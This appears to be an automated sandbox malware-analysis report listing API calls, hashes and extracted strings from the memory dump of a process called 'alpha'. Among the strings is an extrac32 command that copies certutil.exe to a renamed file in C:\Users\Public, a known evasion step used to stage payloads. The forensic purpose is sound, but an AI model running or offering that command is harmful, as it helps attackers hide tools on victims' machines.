                                                                    • Instruction ID: 56ce99818ca43ac7db59dbb5ed99cc17b852ae68a629ffa3287d1d2825b3df67
                                                                    • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                    • Instruction Fuzzy Hash: 3FA1B921B08E4285FB58AF2694506B9A2B3BF857ACFC04135DA5E47AD5EF3CD44B8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQueryToken
                                                                    • String ID:
                                                                    • API String ID: 4239771691-0
                                                                    • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                    • Instruction ID: be4c9876180730a694387d4e5ecf5afb327cf4e35a1c434861de1a5d78470f42
                                                                    • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                    • Instruction Fuzzy Hash: F9115272618B81CBEB109F01E4407A9FBB5FB857A9F504132DB4802A94DF7DD58DCB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: FileInformation$HandleQueryVolume
                                                                    • String ID:
                                                                    • API String ID: 2149833895-0
                                                                    • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                    • Instruction ID: c14b124c89a0fdb10707e9289c17e09606336c61580eba6f2ced2a03e4404b06
                                                                    • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                    • Instruction Fuzzy Hash: 25115131608B828AE7609F51F4417AEF7A1FB44B98F849531DA9D42A54DFBCD84DCB20
                                                                    APIs
                                                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF719684227), ref: 00007FF719688678
                                                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF719684227), ref: 00007FF7196886D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File
                                                                    • String ID:
                                                                    • API String ID: 2838179519-0
                                                                    • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                    • Instruction ID: 07541587057e269cca7d6b9dd52c3a84b180c86f2dd690ea9cf3176ac7aa21c6
                                                                    • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                    • Instruction Fuzzy Hash: A8117056518A80C9D7249F25E00013AF371FF9CB59B545122FA8D82764EB3CC946CB29
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • towupper.MSVCRT ref: 00007FF7196685D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                    • String ID:
                                                                    • API String ID: 3520273530-0
                                                                    • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                    • Instruction ID: 8714a2ded457384e29de8fe9a663d741616034dc9b887bfdcafdf050e90092ef
                                                                    • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                    • Instruction Fuzzy Hash: C261A761A0CA0285F7A8BF34D51437DA6B2FB1477CF808136DA1E562D5DE3CE49A9332
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQueryToken
                                                                    • String ID:
                                                                    • API String ID: 4239771691-0
                                                                    • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                    • Instruction ID: 6cd3c2c8345cb9e9e5829b787bcaa8dc0d6ab294a7d893f7b1f4d949403e64d7
                                                                    • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                    • Instruction Fuzzy Hash: B9F030B3704B81CBD7009F64E58489CB778F744B98795857ACB2803704DB75D9A9CB50
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7196793BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                    • Instruction ID: d01ebb23010e6255fc5eed5d33e854295cbdb7956cbed3300ea6c9a6c53e19ac
                                                                    • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                    • Instruction Fuzzy Hash: 6FB09220E25802E1D608BF21AC8106052B16B5C734FC01471C00E88160DE1C959F8730
                                                                    APIs
                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF71966F52A,00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F8DE
                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F8FB
                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F951
                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F96B
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966FA8E
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF71966FB14
                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966FB2D
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966FBEA
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF71966F996
                                                                      • Part of subcall function 00007FF719670010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71968849D,?,?,?,00007FF71968F0C7), ref: 00007FF719670045
                                                                      • Part of subcall function 00007FF719670010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71968F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF719670071
                                                                      • Part of subcall function 00007FF719670010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719670092
                                                                      • Part of subcall function 00007FF719670010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7196700A7
                                                                      • Part of subcall function 00007FF719670010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF719670181
                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71967D401
                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71967D41B
                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71967D435
                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71967D480
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                    • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                    • API String ID: 3964947564-518410914
                                                                    • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                    • Instruction ID: dedebfe45851e5829abb200345692650a2a029268986acf8799663339fb8cc4f
                                                                    • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                    • Instruction Fuzzy Hash: E4025821A09E42CAEA18BF21A850178E6B7BF95BBCFD44535D91E46694DF3DE40BC330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$iswspacewcschr
                                                                    • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                    • API String ID: 840959033-3627297882
                                                                    • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                    • Instruction ID: f63ea3552a1364de2c54e1baf8544b533cc30d33766b73eb9122bba68413fcc7
                                                                    • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                    • Instruction Fuzzy Hash: 6CD14C25E0CE43C6EA14BF21A8152B9A6B3BF54B6CFC45035D60E46295EF2CE94F8731
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$EnvironmentVariable
                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                    • API String ID: 198002717-267741548
                                                                    • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                    • Instruction ID: ad829ceb26c4dcbed9c33b0d56128d6bbcd011dccdf71b4f5a8dd195d5264b73
                                                                    • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                    • Instruction Fuzzy Hash: 6D511E25A08E4389EA14BF11A810679EB72FF59FA8FD4A075D90E43654DF2CE44E8770
                                                                    APIs
                                                                    • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F000
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F031
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F0D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigitiswspacewcschr
                                                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                    • API String ID: 1595556998-2755026540
                                                                    • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                    • Instruction ID: 99d09cc200b2abdc81d0d761459c7888116a89bf7fd4a08d11c132f097812440
                                                                    • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                    • Instruction Fuzzy Hash: B42288A5E0CE5285FA60BF16A550279E6B2BF10BB8FC05136D98D462E4DF3CA44F9730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                    • String ID: "$=,;
                                                                    • API String ID: 3545743878-4143597401
                                                                    • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                    • Instruction ID: c9721b67206ecece77cbef76703737809ba9b6a8de1e487c355a684d76724b1d
                                                                    • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                    • Instruction Fuzzy Hash: 62C19461E09E5285EB256F119820379FAF2FF55F6DF849035CA4D02794EF3CA48B8231
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFormatMessageThread
                                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                    • API String ID: 2411632146-3173542853
                                                                    • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                    • Instruction ID: 88f8e7abfff6dc20cd30a5a5d32d8de8e44bcb785ba0630d46e7fbc65b321e35
                                                                    • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                    • Instruction Fuzzy Hash: FE616BA1A19F82C5EA64EF51A5055A4E3B2FB44BACFC4007AEE0D17758CF3CE54A8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile_open_osfhandle
                                                                    • String ID: con
                                                                    • API String ID: 2905481843-4257191772
                                                                    • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                    • Instruction ID: 09f24eb381075a1aa031bba84f8286e1e113d96e4a7e240c8013669a3141a2b1
                                                                    • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                    • Instruction Fuzzy Hash: 9E71B732608A819AE724AF14E440679F6B2FB89B79F945234DA5E427D4DF3CD44ECB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                    • String ID:
                                                                    • API String ID: 3829876242-3916222277
                                                                    • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                    • Instruction ID: 0c5ff4032d5fdfbcd3976c793cb609982bbb4d1505ccc210ae809818cc98ee70
                                                                    • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                    • Instruction Fuzzy Hash: F8615236A08B42C6EA14AF11941557AF7B2FF89BA8F859134DE0E07794DF3CE54A8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
